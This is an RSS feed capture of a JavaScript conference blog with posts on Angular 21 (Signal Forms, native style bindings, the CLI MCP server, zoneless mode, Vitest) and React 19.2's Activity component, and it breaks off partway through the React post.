International JavaScript Conference https://javascript-conference.com/ Mon, 24 Nov 2025 14:41:47 +0000 en-US hourly 1 https://wordpress.org/?v=6.7.2 https://javascript-conference.com/wp-content/uploads/2017/03/ijs-favicon-64x64.png International JavaScript Conference https://javascript-conference.com/ 32 32 Angular 21: Signal Forms, Smart Styling, MCP & Beyond https://javascript-conference.com/blog/angular-21-signal-forms-smart-styling-mcp/ Fri, 14 Nov 2025 10:17:13 +0000 https://javascript-conference.com/?p=108526 Angular v21 marks a historic architectural shift, completing the framework’s transition to a Signals-first, zoneless core that redefines reactivity, performance, and developer experience. This article explores the new Signal Forms API and introduces Smart Styling, which is Angular’s native approach to class and style bindings for maximum clarity and efficiency. You will also discover how the emerging Model Context Protocol (MCP) Server integrates AI directly into the Angular CLI, paving the way for intelligent, context-aware code generation and automated migrations in future releases.

The post Angular 21: Signal Forms, Smart Styling, MCP & Beyond appeared first on International JavaScript Conference.

]]>
The Signals-First Revolution and the New Architectural Core

Angular v21 does not merely introduce a new set of features; it completes a fundamental architectural revolution, decisively marking the framework’s entrance into a Signals-first, zoneless paradigm. This release resolves the historical performance and complexity bottlenecks that often accompany large-scale Angular applications, positioning the framework for superior runtime performance and a dramatically improved Developer Experience (DX).

The most profound shift lies in the near-complete transition from the coarse-grained, Zone.js-based change detection to a model of fine-grained reactivity driven by Signals. The traditional approach, which relied on Zone.js to patch browser asynchronous APIs, often resulted in unnecessary re-checks across the entire component tree after any async event.

Angular v21 finalizes the stability of its zoneless APIs, allowing applications to operate without this performance-limiting layer. This architectural change immediately results in smaller application bundles, faster startup times, and minimal runtime overhead, as the framework updates only the specific view nodes that depend on the changed signal value. This move aligns Angular with the highest performance standards set by other modern frameworks.

Complementing this performance core is the continued maturation of the standalone architecture. By making standalone components and APIs the default for new applications, Angular v21 dramatically reduces reliance on NgModules, cutting down on boilerplate and streamlining project structure. This modular approach is vital for enterprise teams utilizing Micro-Frontend Architectures, enabling components to be easily portable and consumed across different applications. The release simplifies essential, common development tasks. For instance, HttpClient is now included by default for standalone projects, removing a small but persistent friction point for developers.

iJS Newsletter

Join the JavaScript community and keep up with the latest news!

These architectural advancements, Signals, zoneless readiness, and standalone stability, are the essential groundwork that enables the two major feature highlights of the release: the highly anticipated Signal Forms and the substantial ergonomic improvements to Smart Styling. These features move beyond simple updates, offering new patterns that will redefine component authorship and state management in Angular applications moving forward.

Looking ahead, the framework is strategically positioned in two key areas. First, the experimental work on the Angular CLI MCP Server is set to mature, paving the way for advanced AI-powered workflows in subsequent releases. This will allow sophisticated models to interact directly with the CLI’s internal tools to perform context-aware code generation, migration, and style adherence. Secondly, the successful transition of Forms to Signals now dictates the future of other packages. Subsequent major versions will focus on rolling out signal-based APIs for the Router and HttpClient (including the stabilization of the resource function), leading to a unified, end-to-end reactive data flow that completely simplifies asynchronous state management across the entire application. The future is an Angular where reactivity is not an optional add-on, but the fundamental, high-performance core of every component and service.

A Deep Dive into Signal Forms

The introduction of Signal Forms is perhaps the most highly anticipated and impactful feature of Angular v21, directly addressing the longstanding issues of complexity, verbosity, and leaky reactivity that plagued the previous Observable-based Reactive Forms API. This new system revolutionizes form handling by adopting a model-first, declarative approach that is inherently compatible with the new zoneless architecture.

Problem Solved: Eliminating Imperative Complexity

The traditional Reactive Forms API required the imperative creation and synchronization of state. Developers had to manually instantiate FormGroup and FormControl instances, define validators, and then manage state changes (like conditional disabling or cross-field validation) by manually subscribing to the valueChanges Observable. This led to error-prone subscription management, potential memory leaks from forgotten unsubscribe calls, and complex logic dispersed across the component class.

Signal Forms resolves this by making the form state a collection of native Signals. This shifts the forms architecture from managing a stream of values to managing a set of reactive values.

The result is:

  1. The form structure and its initial value are defined by a simple, strongly-typed model object wrapped in a writable signal.
  2. Form control values, validity, and status (e.g., touched, dirty) are all exposed as signals. The application’s view automatically reacts to these signals, completely eliminating the need for manual subscriptions and the ChangeDetectorRef when handling form state.
  3. Conditional logic, such as disabling one field based on another’s value, is defined directly within the form builder function using declarative statements that operate on the signals, not via manual valueChanges subscriptions.

iJS Newsletter

Join the JavaScript community and keep up with the latest news!

Code Example: Declarative User Registration Form

To illustrate this simplification, consider a basic user registration form. The code demonstrates how the model, form definition, and template binding become seamlessly interconnected.

import { Component, signal } from '@angular/core';
import { form, required, email, minLength, Control } from '@angular/forms/signals';

// Define the clear, strongly-typed data model
interface UserRegistration {
  email: string;
  username: string;
}

@Component({
  selector: 'app-user-form',
  // Import the Control directive for template binding
  imports: [Control],
  template: `
    <form (submit)="onSubmit($event)">
      <label>Email:
        <input type="email" [control]="registrationForm.email" />
      </label>
      @if (registrationForm.email().invalid()) {
        <div class="error-message">Email is invalid or required.</div>
      }
      
      <label>Username:
        <input type="text" [control]="registrationForm.username" />
      </label>
      @if (registrationForm.username().invalid()) {
        <div class="error-message">Username must be at least 4 characters.</div>
      }

      <button type="submit" [disabled]="registrationForm().invalid()">
        Register
      </button>
      
      <pre>Form Value: {{ registrationForm.value() | json }}</pre>
    </form>
  `
})
export class UserFormComponent {
  // 1. Define the model signal
  private readonly initialModel = signal<UserRegistration>({
    email: '',
    username: ''
  });

  // 2. Define the Signal Form, including validation rules
  public readonly registrationForm = form(
    this.initialModel,
    (p) => [ // 'p' is the path object representing the form structure
      required(p.email, { message: 'Email is required' }),
      email(p.email, { message: 'Must be a valid email format' }),
      required(p.username, { message: 'Username is required' }),
      minLength(p.username, 4, { message: 'Min length is 4' }),
    ]
  );

  onSubmit(event: SubmitEvent): void {
    event.preventDefault();
    if (this.registrationForm().valid()) {
      console.log('Submitted data:', this.registrationForm.value());
      // Here you would typically call a service to submit the data
    } else {
      console.error('Form is invalid.');
      // Logic to mark all fields as touched to show all errors
      // (The new API has methods like markAllAsTouched for this)
    }
  }
}

Here, the form’s structure is implicitly defined by the UserRegistration interface and the initialModel signal. The form() function then wraps this model.

Validators (requiredemailminLength) are not passed as arrays as constructor arguments but are declared separately in a functional array within the form() call. This separates model definition from validation logic, improving readability.

In the template, the new [control] directive replaces formControlName and ngModel. It binds the input element directly to a control signal (registrationForm.email), making the binding explicit and reactive.

Checking validity is trivial: @if (registrationForm.email().invalid()) immediately accesses the state of the email control signal without any pipe or subscription. Similarly, the submit button is disabled via [disabled]=”registrationForm().invalid()”, leveraging the parent form’s computed validity signal.

So, by embracing Signals, the Signal Forms API simplifies the core development loop: define the model, apply validations functionally, and access state reactively in the template. This makes forms significantly easier to reason about, test, and maintain, especially in large, complex applications.

iJS Newsletter

Join the JavaScript community and keep up with the latest news!

Explanation of Angular Form State Methods

Angular forms rely on tracking various states to determine when to show errors or enable submission.

The methods valid() and invalid() reflect the current validation status of a control or the entire form based on the rules you defined. For instance, the form submission button uses [disabled]=”registrationForm().invalid()” to ensure it can only be clicked if the data meets all requirements, meaning registrationForm().valid() is true.

// If the email field passes all validation rules 
// Example: The user typed "[email protected]" registrationForm.email().valid(); // true 

// If the username is empty (and required) 
// Example: The user typed nothing registrationForm.username().invalid(); // true

The methods dirty() and pristine() track whether the user has modified the initial value of a control. A control starts as pristine (control().pristine() is true). As soon as the user types a single character, it becomes dirty, making control().dirty() true, and it remains so until you manually reset the form.

// Initial load state 
// Example: The form is first displayed registrationForm.email().pristine(); // true 

// After the user types "a" in the email field 
registrationForm.email().dirty(); // true

The methods touched() and untouched() track user interaction by focus. A control starts as untouched, and only becomes touched (control().touched() is true) after the user has focused on the field and then clicked or tabbed away (the “blur” event). This is often combined with the invalid state to display errors, as seen in the template where we check @if (registrationForm.email().invalid() && registrationForm.email().touched()) to avoid showing an error the moment the form first loads.

<!-- The error message only shows if the email is invalid AND the user has left the field --> 
@if (registrationForm.email().invalid() && registrationForm.email().touched()) 
{ <!-- Show error here --> }

Finally, the markAllAsTouched() method, which is not a state but an action, forces the touched() status to true for every control inside the form group. We use this.registrationForm().markAllAsTouched() inside the onSubmit method when the form is invalid to ensure all users see all potential errors right away, instead of only seeing them one by one as they manually interact with each field.

// Called when the user clicks submit but the form is invalid 
this.registrationForm().markAllAsTouched();

You can see a fully operational example in the code below.

user registration angular 21

import { ChangeDetectionStrategy, Component } from '@angular/core';
import { FormGroup, FormControl, Validators, ReactiveFormsModule, ValidationErrors } from '@angular/forms';
import { JsonPipe, NgIf, NgClass } from '@angular/common';

// The application uses standard Reactive Forms (FormGroup, FormControl)
// instead of the experimental Signal Forms to ensure stable compilation.

@Component({
  standalone: true,
  selector: 'app-root', 
  // Import ReactiveFormsModule to enable directives like formGroup and formControlName
  imports: [ReactiveFormsModule, NgIf, JsonPipe, NgClass], 
  template: `
    <div class="p-8 max-w-lg mx-auto bg-white shadow-xl rounded-xl">
      <h2 class="text-3xl font-extrabold text-indigo-700 mb-6 border-b pb-2">User Registration</h2>
      
      <!-- Bind the formGroup to the HTML form element -->
      <form [formGroup]="registrationForm" (ngSubmit)="onSubmit()" class="space-y-5">

        <!-- Email Field -->
        <div class="form-group">
          <label class="block text-sm font-medium text-gray-700 mb-1" for="email">Email:</label>
          <input id="email" type="email" formControlName="email" 
                 placeholder="[email protected]"
                 class="w-full p-2 border border-gray-300 rounded-lg focus:border-indigo-500 transition duration-150" />
          
          <!-- Access the email control to check state and errors -->
          @if (emailControl.invalid && emailControl.touched) {
            <div class="mt-1 text-sm text-red-600">
              {{ getFirstErrorMessage(emailControl.errors) }}
            </div>
          }
        </div>
          
        <!-- Username Field -->
        <div class="form-group">
          <label class="block text-sm font-medium text-gray-700 mb-1" for="username">Username:</label>
          <input id="username" type="text" formControlName="username" 
                 placeholder="min. 4 characters"
                 class="w-full p-2 border border-gray-300 rounded-lg focus:border-indigo-500 transition duration-150" />

          <!-- Access the username control to check state and errors -->
          @if (usernameControl.invalid && usernameControl.touched) {
            <div class="mt-1 text-sm text-red-600">
              {{ getFirstErrorMessage(usernameControl.errors) }}
            </div>
          }
        </div>

        <!-- Submit Button -->
        <button type="submit" 
                [disabled]="registrationForm.invalid"
                class="w-full py-2 px-4 rounded-lg text-white font-semibold transition duration-200"
                [ngClass]="registrationForm.invalid ? 'bg-gray-400 cursor-not-allowed' : 'bg-indigo-600 hover:bg-indigo-700 shadow-md'">
          Register
        </button>
          
        <!-- Form State Debug -->
        <div class="p-3 bg-gray-50 border rounded-lg text-xs font-mono mt-5">
          <p>Valid: {{ registrationForm.valid | json }}</p>
          <p>Touched: {{ registrationForm.touched | json }}</p>
          <p>Dirty: {{ registrationForm.dirty | json }}</p>
          <pre>Value: {{ registrationForm.value | json }}</pre>
        </div>
      </form>
    </div>
  `,
  styles: [`
    /* Using native CSS for the component for clean styling */
    .form-group {
      margin-bottom: 1.25rem;
    }
  `],
  changeDetection: ChangeDetectionStrategy.OnPush,
})
export class App {
  // Define the main form group with all controls and validators
  public registrationForm = new FormGroup({
    email: new FormControl('', {
      validators: [
        Validators.required, 
        Validators.email
      ],
      nonNullable: true
    }),
    username: new FormControl('', {
      validators: [
        Validators.required, 
        Validators.minLength(4)
      ],
      nonNullable: true
    })
  });

  // Helper getters for easy access in the template
  get emailControl(): FormControl {
    return this.registrationForm.get('email') as FormControl;
  }
  
  get usernameControl(): FormControl {
    return this.registrationForm.get('username') as FormControl;
  }


  onSubmit(): void {
    
    // Check form validity (using the .valid property)
    if (this.registrationForm.valid) {
      console.log('Submitted data:', this.registrationForm.value);
      // Successful submission logic (e.g., API call)
    } else {
      console.error('Form is invalid. Marking all controls as touched.');
      
      // Action: Mark all controls as touched to trigger immediate error display 
      this.registrationForm.markAllAsTouched();
    }
  }

  // Helper to extract the first error message from the ValidationErrors object
  getFirstErrorMessage(errors: ValidationErrors | null): string {
    if (!errors) {
      return '';
    }
    const errorKey = Object.keys(errors)[0];
    
    // Custom messages are not easily passed with standard Validators, 
    // so we return a friendly default based on the validator key.
    if (errorKey === 'required') {
        return 'This field is required.';
    }
    if (errorKey === 'email') {
        return 'Must be a valid email format.';
    }
    if (errorKey === 'minlength' && errors['minlength']) {
        const requiredLength = errors['minlength'].requiredLength;
        return `Minimum length is ${requiredLength} characters.`;
    }

    // Fallback
    return `Validation failed for: ${errorKey}`;
  }
}

iJS Newsletter

Join the JavaScript community and keep up with the latest news!

Smart Styling, Performance, and Future Outlook

Angular v21 completes the picture of a modernized framework not only through its core architectural shifts but also by refining its template directives, turbocharging its Server-Side Rendering (SSR) capabilities, and laying the strategic groundwork for future innovations like sophisticated AI tooling.

The concept of Smart Styling in Angular v21 revolves around an official endorsement of native HTML bindings over historical directive abstractions, improving both performance and code clarity. The framework is guiding developers away from the use of NgClass and NgStyle, which are being softly deprecated. While these directives remain functional for backward compatibility, the recommended best practice is now to use the native [class] and [style] bindings. This strategic pivot aligns Angular more closely with standard web practices and leverages the native efficiency of the browser’s DOM manipulation.

The rationale is twofold: performance gains and simplification. Native bindings directly manipulate DOM properties, removing the small but measurable overhead of intermediary directives, leading to cleaner code and simpler debugging. For instance, dynamic class assignment is now cleaner using expressions like [class.active]=”isActiveSignal()” seamlessly integrated with the Signal-driven reactivity. This emphasis on native expression binding is part of a broader template optimization effort, which also includes the final stabilization of the new built-in template control flow (@if, @for), eliminating the need for *ngIf and the associated CommonModule boilerplate.

Example: Smart Styling with Native Bindings

The following component demonstrates how to use native property bindings ([class] and [style]) with Signals, which is the recommended practice over the soon-to-be-removed NgClass and NgStyle directives. This approach is cleaner, more performant, and instantly familiar to anyone experienced with standard HTML and JavaScript.

The component defines signals for state (an alert count and a theme preference) and uses a computed() signal to derive complex styling properties.

import { Component, signal, computed } from '@angular/core';

@Component({
  standalone: true,
  selector: 'app-smart-alert',
  template: `
    <div 
      [class.error]="alertCount() > 0"
      [class.warn]="alertCount() > 5"
      [class.dark-theme]="isDarkTheme()"
      [style.font-size.px]="alertFontSize()"
      [style.border-color]="borderColorComputed()"
    >
      You have {{ alertCount() }} outstanding alerts.
      <button (click)="alertCount.update(c => c + 1)">Add Alert</button>
      <button (click)="isDarkTheme.set(!isDarkTheme())">Toggle Theme</button>
    </div>
  `,
  styles: [`
    .error { color: red; }
    .warn { font-weight: bold; }
    .dark-theme { background-color: #333; color: #fff; }
  `]
})
export class SmartAlertComponent {
  // Writable Signals for state
  public readonly alertCount = signal(2);
  public readonly isDarkTheme = signal(false);

  // Computed Signal for derived class property
  public readonly alertFontSize = computed(() => {
    // Dynamically increase font size based on the alert count
    return 16 + Math.min(this.alertCount(), 10);
  });

  // Computed Signal for derived style property
  public readonly borderColorComputed = computed(() => {
    // Logic to switch border color based on theme
    return this.isDarkTheme() ? '#777' : '#000';
  });
}

Now we have:

Direct Class Binding ([class.name]=”expression”):

  • Old Way: <div [ngClass]=”{‘error’: alertCount > 0}”>… required an external object evaluation or a dictionary-style input.
  • New Way: <div [class.error]=”alertCount() > 0″>… uses a direct property binding. Angular adds the class error only when the bound Signal expression is truthy. This is the simplest, most performant way to toggle a single class.

Native Style Binding ([style.property.unit]=”value”):

  • Old Way: <div [ngStyle]=”{‘font-size.px’: 16 + alertCount}”>… relied on the NgStyle directive.
  • New Way: <div [style.font-size.px]=”alertFontSize()”>… uses the native [style] binding. The .px suffix is an Angular feature that binds the unit directly to a number type, ensuring correct and efficient DOM manipulation without string concatenation boilerplate in the template.

Signal Integration:

Both the class and style bindings are consuming the results of signals (alertCount(), isDarkTheme(), and the derived alertFontSize()). Because these are native Signals, Angular’s fine-grained reactivity ensures that if the alertCount updates, only the specific class and style properties related to the alert count will be re-evaluated and applied to the DOM, preserving maximum performance and avoiding unnecessary checks.

This declarative pattern, combining Signals with native bindings, is the essence of smart styling in Angular v21, leading to code that is more readable, maintainable, and highly optimized for the modern web.

AI Integration: The CLI Model Context Protocol (MCP) Server

Angular v21 introduces a profound, strategic enhancement that prepares the framework for the next era of software development: the Angular CLI Model Context Protocol (MCP) Server. This addition is not a developer-facing feature in the traditional sense, but rather a critical architectural middleware that transforms generic Large Language Models (LLMs) and coding assistants into highly specialized, context-aware Angular co-pilots. This mechanism is paramount to maximizing developer velocity while simultaneously preserving code quality and project consistency.

Bridging the Gap: Context vs. Training Data

The core problem the MCP Server solves is the inherent limitation of AI training data. An LLM’s knowledge of Angular is static, based on information available up to its last training cut-off. For a rapidly evolving framework like Angular, this means models often generate outdated code (e.g., using deprecated NgModules, RxJS patterns, or old syntax).

The MCP Server effectively closes this gap by providing real-time, authoritative context. It acts as a specialized agent that runs alongside the Angular CLI, exposing a curated set of internal tools to the AI model. When a developer asks the AI to perform a task, the AI can call these tools to retrieve the live, current state of the project and the framework.

Strategic Use Cases for Development Teams

The integration of the MCP Server enables several powerful, project-specific workflows:

  1. When a developer prompts the AI to “generate a component for the checkout feature,” the AI can call a tool exposed by the MCP Server to read the local angular.json file. This provides instant knowledge of the project’s naming conventions, component prefixes, styling preferences (e.g., SCSS vs. CSS), and directory structure. The resulting code is guaranteed to conform to the team’s established standards, minimizing time spent on boilerplate and code review corrections.
  2. The Server can expose tools related to migration schematics. This allows the AI to analyze existing code and automatically apply the necessary Signal-based refactoring or structural changes (like converting *ngIf to @if). This dramatically reduces the risk and manual effort involved in keeping a large codebase current with the latest high-performance best practices.
  3. The Server ensures the AI always references the correct, current API. For instance, when generating code using Signal Forms, the AI is prompted to retrieve the v21 API details via the Server’s tools, preventing it from incorrectly generating logic based on the legacy Observable patterns.

Moreover, the MCP Server is designed with necessary security and integrity safeguards. The protocol dictates that the CLI only exposes specific, predefined tools, avoiding general-purpose file system or shell execution access. This strict limitation on the model’s access minimizes the attack surface. Furthermore, the final stage of any AI-driven workflow requires the “Human-in-the-Loop” (HITL). All generated code is provided as a suggestion or diff, ensuring that the developer remains the ultimate authority, reviewing and testing every AI-generated change before it is committed to the codebase. The MCP Server thus empowers teams to leverage AI as a sophisticated accelerator without compromising on quality or control.

iJS Newsletter

Join the JavaScript community and keep up with the latest news!

Conclusion

Angular 21 represents a pivotal step in the framework’s evolution, solidifying its commitment to performance, simplicity, and developer experience. By embracing Signals for state management and modernizing its core architecture, Angular offers developers a powerful, yet increasingly streamlined, platform for building robust applications. These updates reduce boilerplate, improve runtime performance, and ensure that Angular remains a top-tier choice for scalable, enterprise-level development.

By now, developers are better equipped than ever to focus on solving complex business problems with clean, efficient, and maintainable code.

The post Angular 21: Signal Forms, Smart Styling, MCP & Beyond appeared first on International JavaScript Conference.

]]>
What’s New in Angular 21? https://javascript-conference.com/blog/angular-21-signal-forms-zoneless-vitest/ Wed, 05 Nov 2025 12:32:53 +0000 https://javascript-conference.com/?p=108516 Angular 21 introduces a new era of efficiency and developer-friendly design. With experimental Signal Forms and default zoneless change detection, this release focuses on performance and reactivity. Let's explore how these updates shape the framework’s future and simplify everyday development.

The post What’s New in Angular 21? appeared first on International JavaScript Conference.

]]>
If you’ve been following Angular’s journey, version 21 brings some fresh air with features that many developers have been waiting for. The long-awaited Signal Forms are finally arriving. Although they’re experimental, this feature gives a glimpse into a smoother, more reactive approach to handling forms in Angular. Meanwhile, zoneless change detection is now enabled by default, boosting the framework’s performance and making your life easier. Let’s go over some of the cool updates coming in Angular 21.

iJS Newsletter

Join the JavaScript community and keep up with the latest news!

Signal Forms

Angular 21 introduces Signal Forms, an experimental but promising feature that offers a fresh, declarative, and reactive way to manage form state using signals. To better understand how Signal Forms work in practice, let’s walk through the basic steps of creating one, starting with defining your form’s state as a signal.

crewMember = signal<CrewMember>(
    {
      name: '',
      imageUrl: '',
      position: ''
    }
  );

  crewForm = form(this.crewMember);

This setup defines a signal holding the crew member’s model. You can then pass this model to Angular’s form() function to create the reactive form tree reflecting this structure.

The next step is to bind individual signal form fields to your HTML elements using the Field directive. This directive creates a two-way binding between the input element and the form’s signal model. Any changes in the input automatically update the form state, and any updates to the model immediately reflect in the input. Using it is really straightforward: just add [field] to your input elements and assign the corresponding form field. Remember to import the Field directive in your component’s imports array; otherwise, Angular won’t recognize it.

<input type="text" [field]="crewForm.name" placeholder="Enter pirate name">
<input type="url" [field]="crewForm.imageUrl" placeholder="Enter image URL">
<input type="text" [field]="crewForm.position" placeholder="Enter crew position">
…
<!--Preview-->
<div>
   <p>Name: {{ crewForm.name().value() }}</p>
   <p>Position: {{ crewForm.position().value() }}</p>
</div>
<img [src]="crewMember().imageUrl">

In this example, you can see inputs bound to the crewForm fields for name, image URL, and position. Just below, there’s a live preview that shows how you can display the current form values by accessing crewForm.name().value() or crewForm.position().value(). Similarly, the image URL is read from the original crewMember signal, demonstrating how both the crewForm and the crewMember signal stay in sync.

Signal Form live preview

Figure 1: Signal Form live preview

iJS Newsletter

Join the JavaScript community and keep up with the latest news!

Validation

To add validation in Signal Forms, pass a schema function into the form() method. The function can include built-in validators, such as required, email, or minLength, alongside your own custom validation logic. Error messages can be customized via options, allowing friendly and precise feedback for users interacting with forms.

crewForm = form(this.crewMember, (path) => {
    required(path.name, { message: 'Name is required' });
    minLength(path.name, 2, { message: 'Name must be at least 2 characters long' });
    required(path.position, { message: 'Position is required' });
    required(path.imageUrl, { message: 'Image URL is required' });
  });

To show validation errors for a form field, first check if the field has been touched (if the user has interacted with it) and is currently invalid. This prevents displaying errors like ‘required’ prematurely before the user starts typing.

You can get the list of errors for the field by accessing its errors() signal, and then display the error message.

@if(crewForm.name().touched() && crewForm.name().invalid()) {
     <ul class="error-message">
       @for(error of crewForm.name().errors(); track $index) {
            <li>{{ error.message }}</li>
       }
     </ul>
 }

Signal Form validation errors

Figure 2: Signal Form validation errors

These examples illustrate the basic usage of Signal Forms to demonstrate core concepts. Check the Angular official docs to learn more about Signal Forms and their evolving functionality. Since this is an experimental API, expect some changes, but also a bright future for building forms declaratively and reactively.

Zoneless by default

Starting with Angular 21, zoneless change detection is now enabled by default. No more Zone.js dependency. The Zoneless API has been stable since Angular 20.2, but version 21 takes it further: there’s no need to import provideZonelessChangeDetection in your app config, as all new Angular applications are now zoneless out of the box.

In a zoneless app, change detection no longer triggers automatically on every async task, like HTTP requests, observables, or timers such as setTimeout or setInterval. This is a big shift compared to how Zone.js worked. Now, change detection runs only when explicitly triggered by certain actions, including:

  • Async pipe
  • User-bound events like clicks or input events
  • Signal value update used in the template
  • markForCheck()
  • call to ComponentRef.setInput()

Going zoneless breaks free from the old Zone.js magic, so change detection fires only on explicit triggers you control, avoiding unnecessary change detection cycles and resulting in better app performance. Removing Zone.js also shrinks the bundle size, which improves Core Web Vitals. Debugging gets cleaner as well, since stack traces are no longer polluted by Zone.js. For best performance, pairing zoneless mode with the OnPush strategy is highly recommended.

Another important advantage is improved compatibility with the wider ecosystem. Since Zone.js patches browser APIs, it sometimes struggles to keep up with new APIs or modern JavaScript features like async/await, which require special handling. Eliminating Zone.js removes this layer of complexity, leading to better long-term maintainability and fewer compatibility headaches.

For in-depth details, migration advice, and performance insights, check out my full guide.

Vitest – New Default Testing Framework

Angular 21 introduces Vitest as the new standard testing framework, replacing Jasmine and Karma for newly created projects. This shift comes after years of uncertainty following Karma’s deprecation in 2023, providing Angular developers with a clear, modern, and efficient testing solution.

Key Benefits:

  • Fast test runs powered by the Vite build tool
  • Native support for TypeScript and ESM
  • Real browser environment testing
  • Modern and rich API

Angular’s move to Vitest means better alignment with the modern JS ecosystem, and future migration utilities will ease switching from Jasmine. Developers will run tests the same way with ng test. Importantly, Jasmine and Karma can still be chosen instead of Vitest if needed.

The Vitest test result in console

Figure 3: The Vitest test result in console

iJS Newsletter

Join the JavaScript community and keep up with the latest news!

Angular ARIA

Angular ARIA is a library created in response to developer requests for accessible components that are simpler to style. It provides a collection of headless Angular directives implementing common accessibility patterns without any predefined styles, allowing developers full control over styling.

Currently, the Angular ARIA library includes accessible directives for the following UI components:

  • Accordion
  • Combobox
  • Listbox
  • Radio Group
  • Tabs
  • Toolbar
<div ngListbox>
      @for (item of crew.value(); track item.id) {
        <div [value]="item.name" ngOption>{{ item.name }}</div>
      }
    </div>

ARIA roles and attributes automatically added by using Angular ARIA directives

Figure 4: ARIA roles and attributes automatically added by using Angular ARIA directives

Other Improvements

Angular 21 goes beyond major new features by delivering various improvements, migrations, and quality enhancements that together modernize and optimize Angular apps.

  • The HttpClient is built in by default, so new projects no longer require manual setup of provideHttpClient().
  • Migration Scripts:
    • Migration from NgClass to class bindings:
      ng generate @angular/core:ngclass-to-class
    • Migration from NgStyle to style bindings:
      ng generate @angular/core:ngstyle-to-style
    • Migration of RouterTestingModule usages inside tests to RouterModule:
      ng generate @angular/core:router-testing-module-migration
    • Replacement of CommonModule imports with standalone imports:
      ng generate @angular/core:common-to-standalone
  • CLI support for Tailwind CSS config generation, making it easier to set up Tailwind CSS in Angular projects right from project creation.

CLI support for Tailwind CSS config generation

Figure 5: CLI support for Tailwind CSS config generation

In addition to these changes, Angular 21 includes numerous bug fixes, performance improvements, and developer experience enhancements that make the framework more stable, efficient, and user-friendly.

iJS Newsletter

Join the JavaScript community and keep up with the latest news!

Conclusion

Angular 21 delivers a thoughtful balance of innovation and refinement, introducing tools that make modern app development more efficient and enjoyable. Signal Forms, Vitest, default zoneless mode, and Angular ARIA directives all emphasize what this update is about: speed, clarity, and accessibility.

Angular continues to prove that a mature framework can still innovate, adapt, and surprise.

References

  1. Angular documentation
  2. ng-conf 2025 LIVE Angular Team Keynote
  3. Vitest documentation

The post What’s New in Angular 21? appeared first on International JavaScript Conference.

]]>
React 19.2 Explained: Updates, Impact, and What to Watch For https://javascript-conference.com/blog/react-19-2-updates-performance-activity-component/ Sun, 26 Oct 2025 17:30:22 +0000 https://javascript-conference.com/?p=108484 React 19.2 brings targeted improvements to performance, rendering, and overall developer experience. Key highlights include updates to the core library and optimizations in React DOM for faster, more efficient UI rendering. Let’s take a closer look at what’s new.

The post React 19.2 Explained: Updates, Impact, and What to Watch For appeared first on International JavaScript Conference.

]]>
What a month for the React ecosystem! On October 7th at the React Conference in Henderson, Nevada, the React Foundation was announced, marking a new era of technical governance for the library and its related projects, including JSX. The founding members include Amazon, Callstack, Expo, Meta, and Vercel, with Expo and Callstack representing major players in the React Native space.

Just a few days before that, the React Team released version 19.2. This release brings new features for component rendering and better performance tools.

These days, most developers start React projects using frameworks like Next.js. On the 9th of October, the team announced the beta for Next.js version 16, which will bake in support for React 19.2. With major support coming soon, let’s look at what’s new in React 19.2 and how you can use these updates in everything from side projects to production grade applications.

Preface

The changes to React 19.2 can be broken down into three core categories:

  • Updates to the React core library
  • Changes to React DOM, the package that enables React to update and render UI components to the web browser by interacting with the browser’s Document Object Model
  • Improvements to existing features from previous changes, such as batched Suspense updates

I’m keeping these categories separate because React isn’t limited to the web. For example, Meta once maintained react-360 for VR content, though it was deprecated in 2020. Today, React can render to formats such as PDF and the Command Line Interface (CLI), among others. There’s a whole host of options that can be found in the chentsulin/awesome-react-renderer GitHub repository. As a result, updates to the core library provide benefits that extend beyond web applications.

What’s new in the Core Library?

The < Activity/> Component

In declarative, state-driven architectures like React, the UI reflects the current state at any given time. To help illustrate this, imagine a dashboard application with a collapsible sidebar menu. Users often interact with such a UI by toggling the visibility of the sidebar based on their needs. Conditional rendering lets you express how different states map to different UI structures.

For example:

const HomePage = () => {
 const [isVisible, setIsVisible] = useState(false)

 return (
   <>
     {isVisible && <Sidebar/>}
     <button onClick={setIsVisible((state) => !state)}>Toggle Show Sidebar</button>
   </>
 )
}

When isVisible transitions from true to false, the component unmounts, and all Effects are destroyed, which cleans up any active subscriptions. No subsequent rendering or state changes can occur.

But by taking this approach, you’re missing out on a couple of features. For instance, if you wanted to temporarily hide a sidebar, but maintain its state (like the open tabs, the scroll position, the form inputs), you only have two options:

  1. Unmount the component → state lost, effects destroyed.
  2. Hide the component with CSS → state preserved, but effects (like subscriptions, event listeners, polling) continue running in the background, wasting resources.

Because React is just JavaScript, there was no built-in way to visually hide something and safely suspend its effects.

Until now. The new < Activity/> component lets you hide and later restore a component, preserving the internal state of its child components.

const HomePage = () => {
 const [isVisible, setIsVisible] = useState(false);

 return (
   <>
     <Activity mode={isVisible ? "visible" : "hidden"}>
       <Sidebar />
     </Activity>
     <button onClick={() => setIsVisible((state) => !state)}>
       Toggle Show Sidebar
     </button>
   </>
 );
};

When the mode prop is set to hidden, the child components are hidden using the display: “none” CSS property, which removes the elements from the document and frees their original space. This is different from the visibility: hidden CSS property, which hides elements but retains their space in the layout.

While hidden, child components continue to re-render in response to new props, but at a lower priority compared to visible content.

When the boundary becomes visible again, React reveals the child components with their previous state restored and re-creates their Effects. Meaning, until we want to make the component visible again, there are no unwanted side effects.

In practice, when the < Sidebar /> component is in mode=”visible”, any navigation items that are expanded or collapsed will preserve their state. If the sidebar becomes hidden and then visible again, those items will remain in the same open or closed state they were in before.

Another way to see this is that the < Activity /> component manages background UI processes. Instead of discarding interface elements that are temporarily out of view, React shifts them into a controlled, low-priority state. The idea is closer to an operating system moving a task to the background queue; its memory and context remain intact, and it can still perform lightweight updates when needed, but it yields most of the CPU to the active, foreground tasks.

Preparing content by pre-rendering with < Activity/>

Sometimes you don’t just want to hide content, you want to prepare it. The < Activity/> component can pre-render components that will soon become visible.

This has great implications for dependency lazy loading or data pre-fetching, leading to reduced loading times.

For example, let’s assume we have a sidebar with items defined and loaded from a CMS. If we wanted to prefetch data before it becomes visible, we could render it inside an < Activity mode=”hidden”> boundary.

This allows React to start fetching data in the background using the use() hook. So by the time users open the sidebar, the data is already available and rendered, and it feels instant.

const sidebarDataPromise = fetchSidebarData()

function Sidebar() {
 const data = use(sidebarDataPromise)
 return (
   <nav>
     {data.items.map((item) => (
       <a key={item.id} href={item.href}>
         {item.label}
       </a>
     ))}
   </nav>
 )
}

TanStack Query gotchas

